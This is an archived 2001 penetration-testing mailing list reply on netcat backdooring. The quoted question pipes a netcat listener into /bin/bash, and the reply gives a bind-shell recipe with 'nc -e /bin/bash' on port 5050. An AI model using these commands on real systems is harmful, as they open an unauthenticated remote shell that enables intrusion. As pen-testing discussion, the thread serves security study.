Penetration Testing mailing list archives

Re: [PEN-TEST] nc backdooring


From: Cold Fire <coldfire () SHADY ORG>
Date: Thu, 25 Jan 2001 21:27:53 +0000

On Wed, Jan 24, 2001 at 10:52:19PM -0200, starlink wrote:
> Hi, folks!
> 
> On one machine (the server, with root permission) I typed:
> 
> nc -l -p 5050 | /bin/bash
> 
> On another machine (the client) I typed:
> 
> nc server_ip 5050
> 
> With this I could execute any program on the server.
> Both machines are Red Hat Linux.
> 
> The question is: how can I get the output of the remote execution back? Is
> there a nicer way of doing this with netcat?


Compile netcat with -DGAPING_SECURITY_HOLE then:

nc -v -l -p 5050 -e '/bin/bash' on the server

and

nc -v <ip> 5050 on your box.

Steve

--
'Cold Fire, Britain's most notorious hacker' Observer, July 1997
'The most recent conviction was that of [Cold Fire] whose On-line
escapades spanned from hacking into educational sites to more
sinister activities such as tapping into industrial and United
States military sites.' DC Paul Cox, SO6 Scotland Yard CCU

